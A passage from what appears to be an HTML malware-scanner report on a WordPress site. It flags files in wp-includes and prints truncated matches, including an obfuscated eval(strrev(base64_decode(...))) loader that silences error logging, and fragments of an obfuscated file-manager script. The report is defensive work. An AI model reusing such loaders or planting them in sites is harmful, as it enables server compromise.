</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { if (</span><span style="color: #0000BB">confirm</span><span style="color: #007700">(</span><span style="color: #DD0000">'Delete?'</span><span style="color: #007700">)) </span><span style="color: #0000BB">_0x02</span><span style="color: #007700">(</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x17</span><span style="color: #007700">), </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-path'</span><span style="color: #007700">)); }); }); </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">querySelectorAll</span><span style="color: #007700">(</span><span style="color: #DD0000">'.rename-btn'</span><span style="color: #007700">).forEach(</span><span style="color: #0000BB">_0x9b </span><span style="color: #007700">=> { </span><span style="color: #0000BB">_0x9b</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0xf</span><span style="color: #007700">)](</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x11</span><span style="color: #007700">), function() { const </span><span style="color: #0000BB">_0xname </span><span style="color: #007700">= </span><span style="color: #0000BB">prompt</span><span style="color: #007700">(</span><span style="color: #DD0000">'New name:'</span><span style="color: #007700">, </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_absolute_root</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$script_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">);}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 175</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x2c</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_0x5f2e</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x54</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x32</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x1a</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'\\'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">displayPathItem</span><span style="color: #007700">(</span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {print </span><span style="color: #DD0000">"<div class='path-nav'><strong></span><span style="color: #007700">{</span><span style="color: #0000BB">$title</span><span style="color: #007700">}</span><span style="color: #DD0000">:</strong>" </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #DD0000">"</div>"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">PathCl</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Result</span><span style="color: #007700">(</span><span style="color: #0000BB">$Int</span><span style="color: #007700">) {</span><span style="color: #0000BB">$I</span><span style="color: #007700">=array(</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'P'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'T'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'M'</span><span style="color: #007700">,</span><span style="color: #DD0000">'V'</span><span style="color: #007700">,</span><span style="color: #DD0000">'h'</span><span style="color: #007700">,</span><span style="color: #DD0000">'E'</span><span style="color: #007700">,</span><span style="color: #DD0000">'L'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'0'</span><span style="color: #007700">,</span><span style="color: #DD0000">'K'</span><span style="color: #007700">,</span><span style="color: #DD0000">'8'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'a'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'D'</span><span style="color: #007700">,</span><span style="color: #DD0000">'e'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'I'</span><span style="color: #007700">,</span><span style="color: #DD0000">'m'</span><span style="color: #007700">,</span><span style="color: #DD0000">'1'</span><span style="color: #007700">,</span><span style="color: #DD0000">'5'</span><span style="color: #007700">,</span><span style="color: #DD0000">'s'</span><span style="color: #007700">,</span><span style="color: #DD0000">'b'</span><span style="color: #007700">,</span><span style="color: #DD0000">'R'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'O'</span><span style="color: #007700">,</span><span style="color: #DD0000">'u'</span><span style="color: #007700">,</span><span style="color: #DD0000">'W'</span><span style="color: #007700">,</span><span style="color: #DD0000">'X'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Z'</span><span style="color: #007700">,</span><span style="color: #DD0000">'+'</span><span style="color: #007700">,</span><span style="color: #DD0000">'c'</span><span style="color: #007700">,</span><span style="color: #DD0000">'@'</span><span style="color: #007700">,</span><span style="color: #DD0000">'d'</span><span style="color: #007700">,</span><span style="color: #DD0000">'3'</span><span style="color: #007700">,</span><span style="color: #DD0000">'r'</span><span style="color: #007700">,</span><span style="color: #DD0000">'F'</span><span style="color: #007700">,</span><span style="color: #DD0000">')'</span><span style="color: #007700">,</span><span style="color: #DD0000">'B'</span><span style="color: #007700">,</span><span style="color: #DD0000">'y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'J'</span><span style="color: #007700">,</span><span style="color: #DD0000">'q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'G'</span><span style="color: #007700">,</span><span style="color: #DD0000">'#'</span><span style="color: #007700">,</span><span style="color: #DD0000">'S'</span><span style="color: #007700">,</span><span style="color: #DD0000">'o'</span><span style="color: #007700">,</span><span style="color: #DD0000">'H'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'A'</span><span style="color: #007700">,</span><span style="color: #DD0000">'i'</span><span style="color: #007700">,</span><span style="color: #DD0000">'j'</span><span style="color: #007700">,</span><span style="color: #DD0000">'t'</span><span style="color: #007700">,</span><span style="color: #DD0000">'v'</span><span style="color: #007700">,</span><span style="color: #DD0000">'w'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">' / '</span><span style="color: #007700">, </span><span style="color: #0000BB">$breadcrumbs</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getPermissions</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$readable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$writable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$executable</span><span style="color: #DD0000">"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">formatFileSize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1073741824</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' GB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1048576</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' MB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1024</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' KB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bytes </span><span style="color: #007700">. </span><span style="color: #DD0000">' By'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFileList</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">LoadFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Y2hy</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_70").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/iPasdMv8jTR.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:21:49</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:21:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_71" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkpXTUweDBbXfimy1tTTEF...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $MAIqK = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($MAIqK($eyxBz('</span><span style="color: #0000BB">OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd</span><span style="color: #007700">+</span><span style="color: #0000BB">KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2Z</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$MAIqK</span><span style="color: #007700">(</span><span style="color: #0000BB">$eyxBz</span><span style="color: #007700">(</span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkp...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">LavE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VJag</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_71").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/MHor9OhNFLJ.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:12:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:12:34</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_72" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkpXTUweDBbXfimy1tTTEF...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $MAIqK = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($MAIqK($eyxBz('</span><span style="color: #0000BB">OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd</span><span style="color: #007700">+</span><span style="color: #0000BB">KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2Z</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$MAIqK</span><span style="color: #007700">(</span><span style="color: #0000BB">$eyxBz</span><span style="color: #007700">(</span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkp...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">LavE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VJag</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_72").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/NKRIt1wiO3U.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:51:10</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:51:10</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 44</span><br><table id="file_73" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 652</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File 